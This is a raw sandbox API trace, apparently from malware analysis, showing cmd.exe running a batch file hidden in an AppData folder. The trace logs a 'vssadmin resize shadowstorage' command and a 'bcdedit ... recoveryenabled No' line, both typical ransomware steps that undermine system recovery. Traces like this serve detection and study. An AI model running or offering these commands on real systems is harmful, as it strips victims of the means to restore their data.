[0036.542] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0036.542] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0036.542] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0036.542] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0036.542] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0036.542] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0036.542] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0036.542] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0036.542] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0036.542] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0036.542] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0036.542] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0036.542] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0036.542] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0036.542] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0036.542] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0036.542] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0036.542] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0036.542] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0036.542] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0036.542] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0036.542] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0036.542] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0036.542] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0036.542] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0036.542] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0036.542] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0036.542] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.542] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.542] SetErrorMode (uMode=0x0) returned 0x1 [0036.542] GetProcessHeap () returned 0x3e0000 [0036.542] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0036.542] GetProcessHeap () returned 0x3e0000 [0036.543] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0036.543] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.543] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.543] GetProcessHeap () returned 0x3e0000 [0036.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.543] GetProcessHeap () returned 0x3e0000 [0036.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.543] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.543] GetProcessHeap () returned 0x3e0000 [0036.543] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.543] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.543] GetProcessHeap () returned 0x3e0000 [0036.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.543] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.543] GetProcessHeap () returned 0x3e0000 [0036.543] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.543] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.543] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.543] GetLastError () returned 0x2 [0036.543] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.543] GetLastError () returned 0x2 [0036.543] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.544] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.544] GetLastError () returned 0x2 [0036.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.544] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.544] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.544] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.544] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb8 [0036.544] GetProcessHeap () returned 0x3e0000 [0036.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f71d0 [0036.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f7268 [0036.544] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f7270, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.544] SetErrorMode (uMode=0x0) returned 0x1 [0036.544] GetProcessHeap () returned 0x3e0000 [0036.544] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7268, Size=0x66) returned 0x3f7268 [0036.544] GetProcessHeap () returned 0x3e0000 [0036.545] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7268) returned 0x66 [0036.545] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.545] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.545] GetProcessHeap () returned 0x3e0000 [0036.545] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72d8 [0036.545] GetProcessHeap () returned 0x3e0000 [0036.545] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7400 [0036.545] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7400, Size=0x122) returned 0x3f7400 [0036.545] GetProcessHeap () returned 0x3e0000 [0036.545] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7400) returned 0x122 [0036.545] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.545] GetProcessHeap () returned 0x3e0000 [0036.545] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7530 [0036.545] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7530, Size=0x76) returned 0x3f7530 [0036.545] GetProcessHeap () returned 0x3e0000 [0036.545] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7530) returned 0x76 [0036.545] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.545] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.545] GetLastError () returned 0x2 [0036.545] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.545] GetLastError () returned 0x2 [0036.545] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.545] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0036.546] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.546] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.546] GetLastError () returned 0x2 [0036.546] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0036.546] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.546] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.546] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.546] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.546] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.546] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.546] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.546] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.546] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.547] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.547] GetProcessHeap () returned 0x3e0000 [0036.547] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.547] GetProcessHeap () returned 0x3e0000 [0036.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0036.548] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.548] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xafc, dwThreadId=0xb00)) returned 1 [0036.560] CloseHandle (hObject=0x74) returned 1 [0036.560] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.560] GetProcessHeap () returned 0x3e0000 [0036.560] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.560] GetEnvironmentStringsW () returned 0x3f8408* [0036.560] GetProcessHeap () returned 0x3e0000 [0036.560] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.560] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.560] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0036.681] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.681] CloseHandle (hObject=0x78) returned 1 [0036.681] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.681] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.681] GetProcessHeap () returned 0x3e0000 [0036.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.681] GetEnvironmentStringsW () returned 0x3f8408* [0036.681] GetProcessHeap () returned 0x3e0000 [0036.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.681] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.681] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.681] GetProcessHeap () returned 0x3e0000 [0036.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.681] GetEnvironmentStringsW () returned 0x3f8408* [0036.681] GetProcessHeap () returned 0x3e0000 [0036.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.681] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.681] GetProcessHeap () returned 0x3e0000 [0036.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.682] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.682] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.682] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.682] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.682] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.682] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.682] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.682] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.682] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.682] SetConsoleInputExeNameW () returned 0x1 [0036.682] GetConsoleOutputCP () returned 0x1b5 [0036.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0036.683] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0036.683] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.683] SetFilePointer (in: hFile=0x78, lDistanceToMove=767, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7530 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7400 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72d8 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7268 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71d0 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.683] GetProcessHeap () returned 0x3e0000 [0036.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0036.684] GetProcessHeap () returned 0x3e0000 [0036.684] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.684] GetProcessHeap () returned 0x3e0000 [0036.684] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0036.684] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.684] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0036.684] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x15c2, lpOverlapped=0x0) returned 1 [0036.684] SetFilePointer (in: hFile=0x78, lDistanceToMove=810, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x32a [0036.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=43, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="bcdedit /set {default} recoveryenabled No\r\n: /maxsize=unbounded\r\n") returned 43 [0036.684] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.684] GetFileType (hFile=0x78) returned 0x1 [0036.684] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.684] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x32a [0036.684] GetProcessHeap () returned 0x3e0000 [0036.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.684] GetProcessHeap () returned 0x3e0000 [0036.684] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.684] GetProcessHeap () returned 0x3e0000 [0036.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4e) returned 0x3f3ff0 [0036.685] _tell (_FileHandle=3) returned 810 [0036.685] _close (_FileHandle=3) returned 0 [0036.685] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0036.685] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0036.685] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0036.685] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0036.685] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0036.685] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0036.685] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0036.685] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0036.685] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0036.685] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0036.685] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0036.685] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0036.685] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0036.685] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0036.685] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0036.685] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0036.685] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0036.685] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0036.685] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0036.685] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0036.685] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0036.685] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0036.685] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0036.685] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0036.686] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0036.686] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0036.686] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0036.686] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0036.686] _wcsicmp 